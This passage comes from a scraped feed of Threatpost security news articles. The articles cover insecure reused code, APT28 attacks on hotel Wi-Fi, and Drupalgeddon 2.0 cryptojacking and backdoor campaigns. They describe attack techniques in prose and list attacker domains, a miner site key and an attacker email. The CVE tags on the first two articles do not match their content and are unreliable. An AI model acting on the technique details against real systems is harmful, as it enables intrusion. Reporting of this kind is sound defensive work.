Java application developers, for example, rely on pre-existing frameworks to handle encryption, visual elements and libraries for handling data.\n\n\u201cSoftware is no longer written from scratch,\u201d Weeks said. \u201cNo matter how new and unique the application, 80 percent of the code used in a software application relies on third-party libraries or components.\u201d\n\nHe said enterprises are more reliant on the software supply chain than ever before. But he says many of the go-to open-source repositories that make up that supply chain are not vetted libraries of reliable code. Rather, they are warehouses with a varying percentage of outdated projects with security issues.\n\nAccording to an analysis of Sonatype\u2019s own Central Repository in 2015, developers had made 31 billion download requests of open source and third-party software components, compared to 17 billion requests the year before. And when Sonatype analyzed its own code library, it found 6.1 percent of code downloaded from its Central Repository had a known security defect.\n\nWeeks says Sonatype is doing better than other repositories that offer no tools, no guidance and no red flags to prevent developers from using frameworks with faulty code. \u201cThere is no Good Housekeeping Seal of Approval for third-party code.\u201d\n\n\u201cFaulty code can easily spawn more problems down the road for developers,\u201d said Stephen Breen, a principal consultant at NTT Com Security. \u201cEven when development teams have the best intentions, it\u2019s easy for developers working under tight deadlines to not properly vet the third-party code used in their software.\u201d\n\nBreen said when insecure code is unknowingly used to build a component within a software program, problems snowball when that component is used inside other larger components. 
One example of vulnerable third-party code reused repeatedly is a deserialization flaw in Apache Commons Collections (commons-collections-3.2.1.jar) \u2013 first reported in 2015 and patched in November of the same year.\n\nSource: Veracode\n\nJarrett found there are still 1,300 instances of the old vulnerable version of the Commons Collections lurking inside Java applications using Spring and Hibernate libraries and hosted across multiple open source code repositories.\n\n\u201cThe developer knows they are picking Spring or Hibernate for their development project. They don\u2019t take it to the next level and realize they are also getting Commons Collections,\u201d Jarrett said. \u201cThat Commons Collections library is then used by thousands more projects.\u201d\n\nAccording to Veracode, Apache Commons Collections is the sixth-most common component used in Java applications. It found that the unpatched versions of the software were in 25 percent of 300,000 Java applications scanned. Even more challenging for developers is updating those applications that are still using the vulnerable version of libraries and frameworks after the flaws were patched.\n\n\u201cThink of it like a faulty airbag. Carmakers used those faulty airbags in millions of vehicles. Now it\u2019s the carmaker on the hook to fix the problem, not the airbag maker,\u201d Jarrett said.\n\n**Leaky Apps, Bad Crypto, Injection Flaws Galore**\n\nVeracode said the Apache Commons Collections example is the tip of the iceberg. When Veracode examined vulnerabilities tied to insecure code it found application information leakage, where user or application data can be leveraged by an attacker, is the most prevalent type of vulnerability, accounting for 72 percent of third-party code flaws. 
Second are cryptographic issues representing 65 percent of vulnerabilities. That was followed by Carriage Return Line Feed (CRLF) injection flaws and cross site scripting bugs.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/12/06232057/Threatpost_Veracode_Top_vuln_cats.png>)\n\nSource: Veracode\n\nCompounding the problem is an increased dependency on open-source components used in a wide variety of software products. The federal government is typical. It has an open-source-first policy as do many private companies. Relying on third-party libraries shortens development time and can improve the safety and quality of their software projects, Weeks said.\n\n\u201cNot only does code reuse save time but it also allows developers to be more innovative as they focus on creating new functionality and not writing encryption libraries from scratch,\u201d Weeks said. Done correctly, code reuse is a developer\u2019s godsend, he said.\n\nFor those reasons, security experts say it\u2019s time for the industry to stop and consider where code originates. Sonatype, which markets and sells code verification services, promotes the idea of documenting software\u2019s supply chain with what it calls a \u201csoftware bill of materials.\u201d That way developers can better scrutinize open-source frameworks before and after they are used; making it easier to update those applications that are using vulnerable old versions of libraries.\n\nSonatype said it found one in 16 components it analyzed had a vulnerability that was previously documented, verified and with additional information available on the Internet. \u201cI can\u2019t imagine any other industry where it\u2019s okay that one in 16 parts have known defects.\u201d\n\nThe problem is that among developers there is a mix of denial and ignorance at play. \u201cDevelopers choose component parts, not security,\u201d Weeks said. 
It should be the other way around.\n\n\u201cIf we are aware of malicious or bad libraries or code, of course we want to warn our users,\u201d said Logan Abbott, president of SourceForge, a software and code repository. \u201cWe scan binaries for vulnerabilities, but we don\u2019t police any of the code we host.\u201d\n\n**Repositories Say: \u2018We\u2019re Just the Host\u2019**\n\nRepositories contacted by Threatpost say their platforms are a resource for developers akin to cloud storage services that allow people to store and share content publicly or privately. They don\u2019t tell users what they can and cannot host with their service.\n\nThey say rooting out bugs in software should be on the shoulders of developers \u2013 not repositories. Writing good vulnerability-free code starts at getting good code from healthy repositories with engaged users.\n\n\u201cBitbucket is to a developer like Home Depot is to a carpenter,\u201d said Rahul Chhabria, product manager for Atlassian Bitbucket. \u201cWe\u2019ve built a hosting service with a variety of tools to help developers execute on their vision.\u201d\n\nChhabria said Bitbucket offers a range of tools to help sniff out bad or insecure components such as the third-party tool SourceClear for scanning dependency chains. It also offers Bitbucket that it says allows for team development of software projects and simplifies peer review. Another feature, Bitbucket Pipelines, is also designed to help developers ship high quality code.\n\nGitHub is one of the largest repositories; it hosts 49 million public and private projects for its 18 million users. It does not scan or red flag insecure code hosted on its platform, according to Shawn Davenport, VP of security at GitHub. 
Instead developers can use third-party tools such as Gemnasium, Brakeman and Code Climate for static and dependency analysis.\n\n\u201cThere is a lot of hidden risk out there in projects,\u201d Davenport said. \u201cWe do our best to make sure our developers know what tools are available to them to vet their own code.\u201d He estimates a minority of GitHub developers take advantage of software scanning and auditing tools. \u201cUnfortunately security isn\u2019t a developer\u2019s first priority.\u201d\n\nOther repositories told Threatpost they intentionally take a hands-off approach and say expecting them to police their own software isn\u2019t feasible, not part of their mission and nothing they plan to do. They point out, flawed or not, developers want access to all code \u2013 even older components.\n\n\u201cAn implementation of a library in one framework might not be a security risk at all,\u201d Breen said. He points out developers often temporarily revert to those old libraries as stopgaps should an updated version break a project.\n\n**Automated Scanning to the Rescue?**\n\nOne attempt at nipping the problem in the bud is the use of automated security vulnerability and configuration scanning for open source components. By 2019, more than 70 percent of enterprise DevOps initiatives will incorporate automated scanning, according to Gartner. Today only 10 percent of packages are scanned.\n\nThe Node.js Foundation, an industry consortium designed to promote the Node.js platform, relies on a more community-based approach via the Node.js Security Project. The goal is to provide developers a process for discovering and disclosing security vulnerabilities found in the Node.js module ecosystem. 
According to Node.js, the approach is a hybrid solution that consists of a database of vulnerabilities and a community communication channel for vetting and disclosing vulnerable code.\n\n\u201cIt\u2019s not a story about security professionals solving the problem, it\u2019s about how we empower development with the right information about the (software) parts they are consuming,\u201d Weeks said. \u201cIn this case, the heart of the solution lies with development, and therefore requires a new approach and different thinking.\u201d\n", "cvss3": {}, "published": "2016-12-15T10:00:39", "type": "threatpost", "title": "Code Reuse a Peril for Secure Software Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-12-27T13:45:57", "id": "THREATPOST:87897784F4B89A5B9E8CE18E2324CC70", "href": "https://threatpost.com/code-reuse-a-peril-for-secure-software-development/122476/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:16", "description": "Russian-speaking cyberespionage group APT28, also known as Sofacy, is believed to be behind a series of attacks last month against travelers staying in hotels in Europe and the Middle East. APT28 notably used the NSA hacking tool EternalBlue as part of its scheme to steal credentials from business travelers, according to a [report](<https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html>) released Friday by security firm FireEye.\n\nOne of the goals of the attack is to trick guests into downloading a malicious document masquerading as a hotel reservation form that, if opened and macros are enabled, installs a dropper file that ultimately downloads malware called Gamefish. 
Gamefish establishes a foothold in targeted systems as a way to install the open source tool called Responder, according to FireEye.\n\n\u201cOnce inside the network of a hospitality company, APT28 sought out machines that controlled both guest and internal Wi-Fi networks,\u201d wrote authors of the report Lindsay Smith and Benjamin Read, both researchers with FireEye\u2019s cyber espionage team.\n\n\u201cTo spread through the hospitality company\u2019s network, APT28 used a version of the EternalBlue SMB exploit. This was combined with the heavy use of py2exe to compile Python scripts. This is the first time we have seen APT28 incorporate this exploit into their intrusions,\u201d researchers said.\n\nFireEye said APT28\u2019s objective was to steal credentials from business travelers using hotel Wi-Fi networks, which the researchers said they did not observe. FireEye does cite a 2016 hotel attack by APT28 with a similar modus operandi. In that incident, a hotel guest\u2019s username and password were stolen while they used the Wi-Fi network. Within 12 hours the victim\u2019s business network was compromised by someone using their credentials.\n\nOnce a foothold was established in the hotel\u2019s Wi-Fi system, the hackers deployed the Responder tool in order to facilitate NetBIOS Name Service (NBT-NS) poisoning. \u201cThis technique listens for NBT-NS (UDP/137) broadcasts from victim computers attempting to connect to network resources. Once received, Responder masquerades as the sought-out resource and causes the victim computer to send the username and hashed password to the attacker-controlled machine,\u201d researchers said.\n\nThat username and hashed password from hotel guests are cracked offline and later used to escalate privileges in the victim\u2019s network, according to FireEye.\n\nIn all, hotels in seven European countries and one Middle Eastern country were targeted. 
\u201cBusiness and government personnel who are traveling, especially in a foreign country, often rely on systems to conduct business other than those at their home office, and may be unfamiliar with threats posed while abroad,\u201d researchers wrote.\n\nAPT28, or Sofacy, is the group implicated by a December [DHS report](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>) related to U.S. election hacks. In a report [released earlier this week](<https://threatpost.com/updates-to-sofacy-turla-highlight-2017-q2-apt-activity/127297/>), Kaspersky Lab said the group has adopted new macro techniques and continued to find new targets such as the French political party.\n\n\u201cThese incidents show a novel infection vector being used by APT28. The group is leveraging less secure hotel Wi-Fi networks to steal credentials and a NetBIOS Name Service poisoning utility to escalate privileges,\u201d FireEye wrote. \u201cPublicly accessible Wi-Fi networks present a significant threat and should be avoided whenever possible.\u201d\n", "cvss3": {}, "published": "2017-08-12T08:00:32", "type": "threatpost", "title": "APT28 Using EternalBlue to Attack Hotels in Europe, Middle East", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-08-12T11:12:17", "id": "THREATPOST:31661FC1D8CDC4988A6B8EB802933A7B", "href": "https://threatpost.com/apt28-using-eternalblue-to-attack-hotels-in-europe-middle-east/127419/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:50:45", "description": "Researchers are warning of a new wave of cyberattacks targeting unpatched Drupal websites that are vulnerable to Drupalgeddon 2.0. 
What\u2019s unique about this latest series of attacks is that adversaries are using PowerBot malware, an IRC-controlled bot also called PerlBot or Shellbot.\n\nResearchers at IBM Security\u2019s Managed Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal website, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability [since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reported under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. 
The Shellbot instance that IBM\u2019s researchers observed connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal website, they can look for SQL injection vulnerabilities, execute DDoS attacks, distribute phishing email spam, and terminate any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those instances adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. 
Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organizations are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately, this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:00", "description": "**UPDATE** \u2013 Hundreds of websites running on the Drupal content management system \u2013 including those of the San Diego Zoo and the National Labor Relations Board \u2013 have been targeted by a malicious cryptomining campaign taking advantage of unpatched and recently revealed vulnerabilities.\n\nThe attacks, which have impacted over 400 government and university websites worldwide, leverage the critical remote-code execution vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) dubbed Drupalgeddon 2.0, said Troy Mursch, researcher with Bad Packets Report. The Drupal bug in question has been patched for over a month now.\n\n\u201cAfter the scan completed, the full scope of this cryptojacking campaign was established,\u201d Mursch wrote in a [report posted Saturday](<https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/>). 
\u201cUsing the bulk scan feature of urlscan.io, it became clear these sites were all running outdated and vulnerable versions of the Drupal content management system.\u201d\n\n> This [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) outbreak started at the zoo and quickly spread to 400+ other sites. <https://t.co/SNRtysBcsi>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 7, 2018](<https://twitter.com/bad_packets/status/993519523826290688?ref_src=twsrc%5Etfw>)\n\nAs of Tuesday evening, Mursch said he has found more websites that were targeted by the attack, including those of Lenovo, UCLA, and the Office of Inspector General of the U.S. Equal Employment Opportunity Commission (a US federal government agency).\n\n> Sheet has been updated with additional sites. It's not an exhaustive list and is subject to change as this [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign is still ongoing. <https://t.co/AwO2oe1znp>\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 8, 2018](<https://twitter.com/bad_packets/status/993644561476894721?ref_src=twsrc%5Etfw>)\n\nThe cryptominer in question was made by Coinhive, a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who secretly embed the code into websites and then mine Monero currency by tapping the CPU processing power of site visitors\u2019 phones, tablets and computers.\n\n\u201cDigging a little deeper into the cryptojacking campaign, I found in both cases that Coinhive was injected via the same method,\u201d Mursch wrote. 
\u201cThe malicious code was contained in the \u2018/misc/jquery.once.js?v=1.2\u2019 JavaScript library.\u201d\n\nMursch said he was notified by one of his Twitter followers soon after of additional compromised sites using a different payload \u2013 however, all the infected sites pointed to the same domain using the same Coinhive site key. Coinhive\u2019s site key is a code tied to a unique cryptographic key that determines who keeps the cryptocurrency being mined.\n\nThe domain used to inject the malware was vuuwd[.]com, according to Mursch. \u201cOnce the code was deobfuscated, the reference to \u2018http://vuuwd[.]com/t.js\u2019 was clearly seen. Upon visiting the URL, the ugly truth was revealed. A slightly throttled implementation of Coinhive was found.\u201d\n\nThe site key used, meanwhile, was \u201cKNqo4Celu2Z8VWMM0zfRmeJHIl75wMx6.\u201d Mursch said he confirmed the key was still active by checking in Fiddler.\n\nMursch said that the miner was only slightly throttled so that it had a reduced impact on visitors\u2019 CPUs and would be harder to detect.\n\nTypically, cryptojacking attacks are not throttled and use 100 percent of the target\u2019s CPU. As a result, victims can sometimes experience overheating of their phone or computer as their device gets bogged down by an over-taxed processor.\n\nWhen trying to nail down the owner of vuuwd[.]com, Mursch came across fake data from WHOIS indicating that \u201cit belongs to \u2018X XYZ\u2019 who lives on \u2018joker joker\u2019 street in China,\u201d he explained in a tweet. However, the email address that was used (goodluck610@foxmail.com) provided a small hint as it was associated with other registered domains.\n\n> While the clearly fake WHOIS data may seem like a dead end, the same email address (goodluck610@foxmail.com) was used to register five other domains. It's likely you'd find malicious activity tied to these as well. One of the domains references less-fake information. 
[pic.twitter.com/IEeqXrAKTT](<https://t.co/IEeqXrAKTT>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [May 4, 2018](<https://twitter.com/bad_packets/status/992539059485528065?ref_src=twsrc%5Etfw>)\n\nThe domain name vuuwd[.]com was also used previously in Monero mining operations through mineXMR[.]com, said Mursch: \u201cWhile it\u2019s somewhat unusual they\u2019d switch from a mining pool with a 1% fee to Coinhive, who takes a 30% cut of all mining proceeds, it was the choice they made,\u201d he said.\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6, 7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits, botnets and cryptomining malware have cropped up \u2013 including a recent attack, leveraging the \u201cKitty\u201d [cryptomining](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>) malware, which cashed in on the vulnerable Drupal websites.\n\nBeyond the Kitty malware, researchers have found a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cWe\u2019ve seen plenty of examples of Drupalgeddon 2 being exploited in the past few weeks,\u201d said Mursch in the report. \u201cThis is yet another case of miscreants compromising outdated and vulnerable Drupal installations on a large scale. If you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-05-07T16:16:20", "type": "threatpost", "title": "Cryptojacking Campaign Exploits Drupal Bug, Over 400 Websites Attacked", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-07T16:16:20", "id": "THREATPOST:88071AD0B76A2548D98F733D0DD3FE1A", "href": "https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-04-25T05:50:00", "description": "Yet another bad actor has taken advantage of Drupal sites still vulnerable to \u201cDrupalgeddon 2.0,\u201d this time to mine cryptocurrency.\n\nThe bad script, dubbed the \u201cKitty\u201d cryptomining malware, takes advantage of the known critical remote-code execution vulnerability in Drupal ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) to target not only servers but also browsers, according to researchers at security company Imperva Incapsula.\n\nOn servers, the attackers install a mining program \u2013 \u201ckkworker\u201d \u2013 which mines the xmrig (XMR) Monero cryptocurrency.\n\nBut the attackers are also looking to expand their mining efforts to web app visitors using a mining script called me0w.js. 
They achieve this by adding the malicious JavaScript (me0w.js) to the commonly used index.php file, cashing in on the processor juice of future visitors to the infected web server site.\n\n\u201cTo win over kitty lovers\u2019 hearts, the attacker cheekily asks to leave his malware alone by printing \u2018me0w, don\u2019t delete pls i am a harmless cute little kitty, me0w,'\u201d the researchers said.\n\nTo make it all happen, the actors behind Kitty have used an open-source mining software for browsers called \u201cwebminerpool\u201d to first write a bash script \u2013 in the form of a PHP file called kdrupal.php \u2013 on a server disk.\n\n\u201cIn doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,\u201d according to Imperva\u2019s [report](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>).\n\nResearchers said that while the PHP backdoor is \u201cfairly light and simple,\u201d it has some tricks up its sleeve, including using the sha512 hash function to protect the attacker\u2019s remote authentication.\n\nOnce this backdoor has been established, a time-based job scheduler is registered to periodically re-download and execute a bash script from remote hosts every minute. 
This means the attackers can easily re-infect the server and quickly push updates to the infected servers under their control.\n\nResearchers said the Monero address used in Kitty was spotted previously in April, in attacks targeting web servers running the vBulletin 4.2.X CMS.\n\nInterestingly, it appears the attacker has updated the malware version after every change in its code, according to the report.\n\n\u201cThe first generation of the \u2018Kitty malware\u2019 we discovered was version 1.5, and the latest version is 1.6,\u201d said the researchers. \u201cThis type of behavior can be an indication of an organized attacker, developing their malware like a software product, fixing bugs and releasing new features in cycles.\u201d\n\nDrupalgeddon 2.0, which has been patched for over a [month](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>) now and impacts versions 6, 7, and 8 of Drupal\u2019s CMS platform, \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin back on March 28.\n\nSince Drupal warned in March that over one million sites running Drupal are impacted by the vulnerability, several exploits have cropped up taking advantage of it.\n\nThat includes a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>), dubbed Muhstik, that installs cryptocurrency miners and launches DDoS attacks via compromised systems. 
More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n", "cvss3": {}, "published": "2018-05-03T16:57:19", "type": "threatpost", "title": "Kitty Cryptomining Malware Cashes in on Drupalgeddon 2.0", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-03T16:57:19", "id": "THREATPOST:3D545239C6AE58821904FBF3069CB365", "href": "https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. 
\u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts by changing the domain name that hosts the JavaScript miner (which is itself obfuscated). The WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d a Make-A-Wish spokesperson told Threatpost. 
\u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, which might use cryptomining as a legitimate source of income but whose ability to secure their website might also be limited, putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T05:52:31", "description": "More than 115,000 sites are still vulnerable to a highly critical Drupal bug \u2013 even though a patch was released three months ago.\n\nWhen it was first revealed, the bug, which has been dubbed Drupalgeddon 2.0, impacted an estimated 1+ million sites running Drupal \u2013 including major U.S. educational institutions and government organizations around the world. 
According to researcher Troy Mursch, up to 115,070 sites are still vulnerable, including websites of a large television network, a mass media and entertainment conglomerate and two \u201cwell-known computer hardware manufacturers.\u201d\n\nA patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available since March. Drupalgeddon 2.0 \u201cpotentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d according to MITRE\u2019s Common Vulnerabilities and Exposures bulletin.\n\nMursch said he located almost 500,000 sites using Drupal 7 (the most widely used version) using the source-code search engine PublicWWW. Any site using at least version 7.58 was not considered vulnerable, as Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are impacted (along with the Drupal 6 and 8.3.x and 8.4.x releases, according to Drupal).\n\n> I've shared the list of 115,070 vulnerable Drupal sites with [@USCERT_gov](<https://twitter.com/USCERT_gov?ref_src=twsrc%5Etfw>) and [@drupalsecurity](<https://twitter.com/drupalsecurity?ref_src=twsrc%5Etfw>). Due to the highly critical risk of CVE-2018-7600 being exploited, the list won't be shared publicly.\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003922275094052864?ref_src=twsrc%5Etfw>)\n\nOf those sites, more than 115,000 were vulnerable, said Mursch, but it may be more: He said he could not ascertain the versions used for 225,056 of the sites. 
Around 134,447 sites were not vulnerable.\n\nMursch told Threatpost he has passed along the list of impacted sites to CERTs and other government organizations for help notifying them.\n\nMeanwhile, while the researcher was scanning for vulnerable sites, he also found yet another new cryptojacking campaign targeting Drupal websites.\n\nThe campaign, which uses the domain name upgraderservices[.]cf to inject Coinhive, impacts over 250 websites, including a police department\u2019s website in Belgium and the Colorado Attorney General\u2019s office.\n\nCoinhive is a company that offers a Monero JavaScript miner to websites as a nontraditional way to monetize website content. Coinhive\u2019s JavaScript miner software is often used by hackers, who sneakily embed the code into websites and then mine Monero currency by tapping the CPU processing power of unwitting site visitors\u2019 phones, tablets and computers.\n\n> I've been monitoring the latest [#cryptojacking](<https://twitter.com/hashtag/cryptojacking?src=hash&ref_src=twsrc%5Etfw>) campaign using upgraderservices[.]cf to inject [#Coinhive](<https://twitter.com/hashtag/Coinhive?src=hash&ref_src=twsrc%5Etfw>) on vulnerable Drupal websites. The list of affected sites has been added to the spreadsheet.<https://t.co/ukZux5aSuM>\n> \n> \u2014 Bad Packets Report (@bad_packets) [June 5, 2018](<https://twitter.com/bad_packets/status/1003864551346003968?ref_src=twsrc%5Etfw>)\n\nMursch said the US-CERT has been notified of the active campaign.\n\nThe cryptomining campaign is only the most recent one to take advantage of the headache that is the Drupal glitch. Earlier in 